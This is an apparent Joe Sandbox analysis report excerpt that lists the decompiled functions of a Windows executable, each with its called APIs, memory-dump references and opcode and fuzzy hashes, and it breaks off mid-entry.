                                                        Function 001390E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00138CF4,?,0014F910), ref: 001390EE
                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00139100
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                        • API String ID: 2574300362-199464113
                                                        • Opcode ID: 91ba5b3cfc63dafb9cbee28566b125e423790e97ff68aa6521d624c4c426069b
                                                        • Instruction ID: f072ca9f6a24d806c4ae97c30b829eb47fda55d3265b6ecb1ef5a8b202fe08a0
                                                        • Opcode Fuzzy Hash: 91ba5b3cfc63dafb9cbee28566b125e423790e97ff68aa6521d624c4c426069b
                                                        • Instruction Fuzzy Hash: 17D01274650713CFD7209F31D81C50676E4AF06751F11C83DD495D6760E7B0C8C0C650
                                                        Function 00101714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: LocalTime__swprintf
                                                        • String ID: %.3d$WIN_XPe
                                                        • API String ID: 2070861257-2409531811
                                                        • Opcode ID: 952c8002b8ddab00498cc44934d69737372eb691102d30428a884c03341ded43
                                                        • Instruction ID: 2e363753bb3c969d3cd8de3442ad6f3c3b6118ec6c64fb89894ccfad4349d526
                                                        • Opcode Fuzzy Hash: 952c8002b8ddab00498cc44934d69737372eb691102d30428a884c03341ded43
                                                        • Instruction Fuzzy Hash: 3CD01771844148FBCB189B909888DFD777CBB09311F550462F846A2091E3B9CB94EA21
                                                        Function 0011717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cb01c0857a244bed0db6cf8fe51dd6f7db2c1d48d1124454423915430f2f4c8e
                                                        • Instruction ID: 567c2fb49e3126d7f131666758f55fbc2cb078e48403da386286134edb08f981
                                                        • Opcode Fuzzy Hash: cb01c0857a244bed0db6cf8fe51dd6f7db2c1d48d1124454423915430f2f4c8e
                                                        • Instruction Fuzzy Hash: D6C12D75A04216EFCB18CFA4C884EAEBBB5FF48714B1585A8E815DB391D730ED81DB90
                                                        Function 0013E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?), ref: 0013E0BE
                                                        • CharLowerBuffW.USER32(?,?), ref: 0013E101
                                                          • Part of subcall function 0013D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0013D7C5
                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0013E301
                                                        • _memmove.LIBCMT ref: 0013E314
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                        • String ID:
                                                        • API String ID: 3659485706-0
                                                        • Opcode ID: 61fcbc6ca45b3a67f181e9948e1bffdc1cc8e77ff316f34408ae9b3dea85aef5
                                                        • Instruction ID: d5bb5beb779f15abef74eb18198833f11f35fd78f46562225e30afa47ec1bffe
                                                        • Opcode Fuzzy Hash: 61fcbc6ca45b3a67f181e9948e1bffdc1cc8e77ff316f34408ae9b3dea85aef5
                                                        • Instruction Fuzzy Hash: 52C13871A08301DFC714DF28C480A6ABBE4FF89714F14896DF8999B392D771E946CB82
                                                        Function 00138093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 001380C3
                                                        • CoUninitialize.OLE32 ref: 001380CE
                                                          • Part of subcall function 0011D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0011D5D4
                                                        • VariantInit.OLEAUT32(?), ref: 001380D9
                                                        • VariantClear.OLEAUT32(?), ref: 001383AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                        • String ID:
                                                        • API String ID: 780911581-0
                                                        • Opcode ID: aedcaae6468b98eaf0cc4c352031cae468dc75aa298577f883013d50077e5519
                                                        • Instruction ID: b6d9dd4d7938e159f087b684787bda13da407efa2640159ca463f35f740e8c8f
                                                        • Opcode Fuzzy Hash: aedcaae6468b98eaf0cc4c352031cae468dc75aa298577f883013d50077e5519
                                                        • Instruction Fuzzy Hash: 50A123756047019FDB04DF64C885B6AB7E4BF89724F14445CF99A9B3A2CB30ED45CB82
                                                        Function 00117530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00152C7C,?), ref: 001176EA
                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00152C7C,?), ref: 00117702
                                                        • CLSIDFromProgID.OLE32(?,?,00000000,0014FB80,000000FF,?,00000000,00000800,00000000,?,00152C7C,?), ref: 00117727
                                                        • _memcmp.LIBCMT ref: 00117748
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: FromProg$FreeTask_memcmp
                                                        • String ID:
                                                        • API String ID: 314563124-0
                                                        • Opcode ID: 0a92c4687abb67145aa023faaa296c011d504d3a15510550bb5c78dad21e7ed5
                                                        • Instruction ID: 6fbf93d2e7c75b823dfba1bc3f52545487b35f1fc1da7fc5103c55a6b5e65aae
                                                        • Opcode Fuzzy Hash: 0a92c4687abb67145aa023faaa296c011d504d3a15510550bb5c78dad21e7ed5
                                                        • Instruction Fuzzy Hash: E1811075A00109EFCB04DFA4C984EEEB7B9FF89315F204568F505AB291DB71AE46CB60
                                                        Function 0011687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Variant$AllocClearCopyInitString
                                                        • String ID:
                                                        • API String ID: 2808897238-0
                                                        • Opcode ID: 45450c71d201d52d4c45e4aea9f627dacdf43b76352337aaf96146b354eb8149
                                                        • Instruction ID: d358084534bc92c4e38b07b8d450cf5f950ee3dcf0559c2f7c0596008f5ec6f8
                                                        • Opcode Fuzzy Hash: 45450c71d201d52d4c45e4aea9f627dacdf43b76352337aaf96146b354eb8149
                                                        • Instruction Fuzzy Hash: 9E51A2746043019ECB2CAF65E895ABEB7E5AF45310F20D82FE586DB292DB71D8C08701
                                                        Function 001497F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowRect.USER32(0144EC50,?), ref: 00149863
                                                        • ScreenToClient.USER32(00000002,00000002), ref: 00149896
                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00149903
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientMoveRectScreen
                                                        • String ID:
                                                        • API String ID: 3880355969-0
                                                        • Opcode ID: 97bed001e6315d2d3b21531b9782c2631a060f966d51f237b47098ccbe4f0ee9
                                                        • Instruction ID: b97f64faea457185586198008e3923f0b1da591326bee5ea3dff1de819e5093e
                                                        • Opcode Fuzzy Hash: 97bed001e6315d2d3b21531b9782c2631a060f966d51f237b47098ccbe4f0ee9
                                                        • Instruction Fuzzy Hash: 9F513D34A00209EFCB14DF68C880AAE7BB6FF56364F14815DF9559B2A0D730AD81CB90
                                                        Function 00119A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00119AD2
                                                        • __itow.LIBCMT ref: 00119B03
                                                          • Part of subcall function 00119D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00119DBE
                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00119B6C
                                                        • __itow.LIBCMT ref: 00119BC3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow
                                                        • String ID:
                                                        • API String ID: 3379773720-0
                                                        • Opcode ID: 333ca4950c3dfebd06670d86a4d266922cc5f897996d25ac2a6352919722c8a7
                                                        • Instruction ID: db1de886974a3cb37816a4a4b500b384ed4bf9ee61b076ecc03dd871e861b07a
                                                        • Opcode Fuzzy Hash: 333ca4950c3dfebd06670d86a4d266922cc5f897996d25ac2a6352919722c8a7
                                                        • Instruction Fuzzy Hash: 03418274A04209ABDF15EF54D855FEE7BB9EF44720F00006DF919A7292DB709E84CB61
                                                        Function 001369AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 001369D1
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 001369E1
                                                          • Part of subcall function 000C9837: __itow.LIBCMT ref: 000C9862
                                                          • Part of subcall function 000C9837: __swprintf.LIBCMT ref: 000C98AC
                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00136A45
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00136A51
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$__itow__swprintfsocket
                                                        • String ID:
                                                        • API String ID: 2214342067-0
                                                        • Opcode ID: 8da085d3de05b17d872cb5d342061f23800cc17b4c6c944a85b31d0f66ee777e
                                                        • Instruction ID: 19b5220560b41ec60fb377e79c54baef2970905a45c037b91f94a7d161af6ef2
                                                        • Opcode Fuzzy Hash: 8da085d3de05b17d872cb5d342061f23800cc17b4c6c944a85b31d0f66ee777e
                                                        • Instruction Fuzzy Hash: F4418175640200AFEB60AF24CC8AFAE77A4AB45B14F04C41CFA59AF2D3DB709D418791
                                                        Function 0013641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0014F910), ref: 001364A7
                                                        • _strlen.LIBCMT ref: 001364D9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _strlen
                                                        • String ID:
                                                        • API String ID: 4218353326-0
                                                        • Opcode ID: de0a965df98ce86ec2bbf5a3cceb93a9cabdb3578237b29d5ed0aec3e52d83fd
                                                        • Instruction ID: e1fc610648e3db72f0dc915b03c07e979efc015da900675e2c02c9bc2667d5fa
                                                        • Opcode Fuzzy Hash: de0a965df98ce86ec2bbf5a3cceb93a9cabdb3578237b29d5ed0aec3e52d83fd
                                                        • Instruction Fuzzy Hash: 46419375A00104BFCB14EBA8DC95FFEB7A9AF54350F148169F91A9B2A3DB30AD40CB50
                                                        Function 0012B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0012B89E
                                                        • GetLastError.KERNEL32(?,00000000), ref: 0012B8C4
                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0012B8E9
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0012B915
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                        • String ID:
                                                        • API String ID: 3321077145-0
                                                        • Opcode ID: bfa3ca0bb991caabd26988ca284a24d581b51da7b7df8c84ec6214becf1f7399
                                                        • Instruction ID: 2da7b67bc18f63d94c1e645953f052b1a152ddd7264d6546e0b0fa2259ee9bf0
                                                        • Opcode Fuzzy Hash: bfa3ca0bb991caabd26988ca284a24d581b51da7b7df8c84ec6214becf1f7399
                                                        • Instruction Fuzzy Hash: 0541F539A00610DFCB11EF15C588A9DBBA1AF4A714F098098ED4A9B762CB30FD55CB91
                                                        Function 00148851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 001488DE
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: InvalidateRect
                                                        • String ID:
                                                        • API String ID: 634782764-0
                                                        • Opcode ID: f3d77ca47a713a6a93d812e95a19f339bbaade6c9dfdc54afafcb34b7beed3e4
                                                        • Instruction ID: 29b9c5cbdd4ff31b7a93be3fa4992dd9a319a3a4fca0ce3618d4eb1bb201cfeb
                                                        • Opcode Fuzzy Hash: f3d77ca47a713a6a93d812e95a19f339bbaade6c9dfdc54afafcb34b7beed3e4
                                                        • Instruction Fuzzy Hash: 1E31F234610509FFEB249B58CC45FBC37A1EB46314F944416FA15E62B1CF30E9909B52
                                                        Function 0014AB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ClientToScreen.USER32(?,?), ref: 0014AB60
                                                        • GetWindowRect.USER32(?,?), ref: 0014ABD6
                                                        • PtInRect.USER32(?,?,0014C014), ref: 0014ABE6
                                                        • MessageBeep.USER32(00000000), ref: 0014AC57
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                        • String ID:
                                                        • API String ID: 1352109105-0
                                                        • Opcode ID: 00e6a736347541fd7c88232fcaddd98bb50fb757b4d07452b93fb146cb4a82a3
                                                        • Instruction ID: 4c844af9abca68d9ceb02a19017ec57a94c9ed48bbda47b6e207020d77790728
                                                        • Opcode Fuzzy Hash: 00e6a736347541fd7c88232fcaddd98bb50fb757b4d07452b93fb146cb4a82a3
                                                        • Instruction Fuzzy Hash: 14419C35A40518DFCB11CF58C8C4AA97BF6FF49300F9A84A9E8189F270C730A981CB92
                                                        Function 00120AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00120B27
                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00120B43
                                                        • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00120BA9
                                                        • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00120BFB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: a48447943c64dd3de517a707b51de0f2d7993290a9eae61294d1f3a8db0f29a2
                                                        • Instruction ID: 3969688caa8c23e5cfb820d9ed1c89c36ce90c87225d591edb0018799a547168
                                                        • Opcode Fuzzy Hash: a48447943c64dd3de517a707b51de0f2d7993290a9eae61294d1f3a8db0f29a2
                                                        • Instruction Fuzzy Hash: E2316E74D40628AEFF36CF25AC05BFABBA5AB4D315F08435EF490512E3C37489A19751
                                                        Function 00120C11 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 00120C66
                                                        • SetKeyboardState.USER32(00000080,?,00008000), ref: 00120C82
                                                        • PostMessageW.USER32(00000000,00000101,00000000), ref: 00120CE1
                                                        • SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 00120D33
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: KeyboardState$InputMessagePostSend
                                                        • String ID:
                                                        • API String ID: 432972143-0
                                                        • Opcode ID: b629fd9cff1bdf7372a82f335496d13b5ff337db86b9df5ef20059a5ee11826b
                                                        • Instruction ID: 75e62baef12b720ff18ad265ac7538b18b396af3414d9b96a409aea10a6144c7
                                                        • Opcode Fuzzy Hash: b629fd9cff1bdf7372a82f335496d13b5ff337db86b9df5ef20059a5ee11826b
                                                        • Instruction Fuzzy Hash: 36315C7090022C6EFF3ACB64AC047FEBB66AB4D310F04435EE480511D2C3755DB59751
                                                        Function 000F61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000F61FB
                                                        • __isleadbyte_l.LIBCMT ref: 000F6229
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 000F6257
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 000F628D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
